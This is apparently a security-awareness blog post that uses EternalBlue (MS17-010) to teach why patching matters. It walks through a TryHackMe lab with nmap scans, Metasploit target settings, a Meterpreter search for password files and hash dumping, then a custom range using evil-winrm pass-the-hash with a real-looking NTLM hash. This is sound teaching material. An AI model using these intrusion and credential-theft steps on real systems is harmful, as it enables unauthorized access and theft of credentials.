TL;DR Why old 0 Days make great teaching tools, the background of one, and a walkthrough.
Welcome to Part VIII of our Back to the Basics Series!
Part I: NTDS.dit vs SAM
Part II: Ownership Matters
Part III: Recovering from a Crash
Part IV: Setting up a Simple Honeypot Account
Part V: Automating DC Deployment
Part VI: Sometimes it’s the dumbest thing
Part VII: Merry Christmas, macros, & Base64
Part VIII: Why old 0 Days make great teaching tools
Part XI: Windows Event Forwarding & SACLs
Part XIII: Setting up a simple honey token
Part XIV: Smartcards and Pass-the-Hash
Getting lectured on security best practices is one thing.
Seeing & doing it for yourself is something else.
As an example, here is what Microsoft said about a vulnerability:
“This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.”
But what does that actually mean exactly? Why should an overworked & underpaid sysadmin make it a priority? How would he/she explain to management why it should be a priority?
An oldie but a goodie
Hence old 0 Days like EternalBlue make an excellent teaching tool even though it is from 2017. CTFs still use it, courses use it, and I have used it for simple reasons:
- It works (99% of the time a student can copy/paste Metasploit commands and access a VM)
- It’s easy to setup for students (just fire up an unpatched Win Server 2008 R2 VM)
- It is an immediate eye opener for those who are new to RCE
- It really hits home the point that prompt patching is vital
Even the college I went to put a packet capture of an attacker using EternalBlue and a cmd.exe reverse shell to load and run fgdump on a target. I would imagine they used cmd.exe since Meterpreter is encrypted and thus does not make for a great teaching tool for traffic analysis.
This vulnerability was known by several names; ms17–010 [Microsoft security bulletin], CVE-2017–0143 [from CVSS], and it’s commonly known name EternalBlue. The vulnerability was in Microsoft’s implantation of SMB1. At the time of discovery Microsoft was recommending that administrators disable the use of SMB1, however the protocol was enabled by default. The vulnerability resulted in RCE as NT AUTHORITY\SYSTEM, meaning of course complete compromise. Due to how Windows stores domain credentials this could also mean compromise of much more than just the one vulnerable system, as seen once NotPetya hit the scene.
- Early to mid 2016 — the Shadow Brokers somehow gain access to a critical Windows exploit
- Jan 2017 — they begin trying to sell tools related to the exploit
- Late Feb 2017 — the vulnerability is publicly classified as CVE-2017–0143
- 14 Mar 2017 — MS releases a patch as part of ‘Patch Tuesday’
- 14 Apr 2017 — Shadow Brokers publicly release their tool on github
- 21 May 2017 — one of the most notorious ransomware attacks begin; Wannacry. It uses the vulnerability to infect unpatched systems worldwide.
On a sidenote, many courses now stress that the ‘time from disclosure to publicly available exploit’ has decreased considerably in recent years.
Walkthrough on THM
Start by running a simple port scan of the target:
sudo nmap -sV -O 10.10.93.156
Nmap includes some really handy scripts that do much more than just port scans. Some of them are pretty decent vulnerability scanners.
nmap -Pn --script vuln 10.10.93.156
Metasploit makes using the vulnerability incredibly simple. One can simply copy/paste the CVE or Microsoft bulletin and then search them in Metasploit to find a matching exploit.
set RHOST 10.10.93.156
set LHOST 10.6.36.88
That’s it. This is why old 0 Days make such good teaching tools. They’re a great hands on aid to stressing how critical patching is. They are also great for hands on awareness of common post exploitation TTPs.
An attacker can search for interesting files via
search -f *password*
They can also navigate around the file system and pull data. Just remember that you have to escape characters like ‘$’ and ‘\’ with a backslash.
One can dump the NLM hashes via
Alternatively one can also use kiwi.
Kiwi is useful for checking for plaintext credentials that may be stored in Windows, as seen below in the range.
Using it on a range
Awhile back I stood up a quick & dirty cyber range for hands on security awareness. I used an unpatched Windows Server 2008 R2 VM as the initial target. The short slide deck that went with the range stressed the importance of patching and kept harping on EternalBlue as an example. This was meant to give users a big hint as to what they should look for.
The initial steps to gain access were the same as the THM walkthrough, but there was a twist. The vulnerable VM was only the first of 3 targets and the next 2 were patched. Users were meant to get hands on with post exploitation techniques, explore the VM, find 2 flags, and find the key that would allow them to move laterally into the second target VM.
Much like THM, the first flag was a text file on the Administrator’s desktop.
The second flag however was a user’s password. Microsoft enabled WDigest by default in Windows versions up to Server 2012. All I had to do was create a user named ‘readme’, set their password to a flag, and log them into the VM before the range started.
At this point the users were meant to run hashdump, notice that SID 500’s password was the only one not stored in plaintext, and use PTH to access the second VM.
One can use Metasploit’s PSexec, the problem is that it tends to trip Defender on updated Windows systems. It’s also not really ‘living off the land’. Therefore a better option is often to just use evil-winrm to PTH:
evil-winrm -i 192.168.0.12 -u skywalker -H 555b3519c107db4ea45104446e322ad7
This works against the default Windows configuration and does not rely on an unpatched vulnerability. This is because while NTLMv2 is salted, the salt is made up of things that are known to the attacker like the time and a nonce that is sent from the server being authenticated to.
New vulnerabilities come up all the time. Today’s 0 Day is next month’s old news. However post exploitation techniques don’t change nearly as often. Much of defense focuses on ensuring that the breach of one system does not result in the breach of all.
Therefore old 0 Days still make great teaching tools.
There is another valuable lesson in there; while SMB1 was enabled by default, Microsoft had been recommending that administrators disable it since at least Sep 2016. This was almost a year before the infamous ransomware struck that exploited the vulnerability. As Microsoft pointed out at the time, SMB1 was designed for a world that no longer existed. It was designed for a small environment where everyone knew everyone, everyone trusted everyone, and there were no malicious actors present.
If you don’t absolutely require old legacy services, protocols, etc then disable them. There’s others that are still in Windows that an attacker will happily abuse such as NetBIOS Name Service, LLMNR, lack of enforcing SMB signing, etc.
Microsoft security bulletin RE MS-17–010: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
Mandiant on time from patch to exploit: https://www.mandiant.com/resources/blog/time-between-disclosure-patch-release-and-vulnerability-exploitation
Microsoft recommendation to disable SMB1: https://techcommunity.microsoft.com/t5/storage-at-microsoft/stop-using-smb1/ba-p/425858
EternalBlue timeline: https://boot13.com/windows/timeline-nsa-hacking-tool-to-wannacry/
WDigest & plaintext passwords: https://blog.netwrix.com/2022/10/11/wdigest-clear-text-passwords-stealing-more-than-a-hash/
Hashes explained: https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4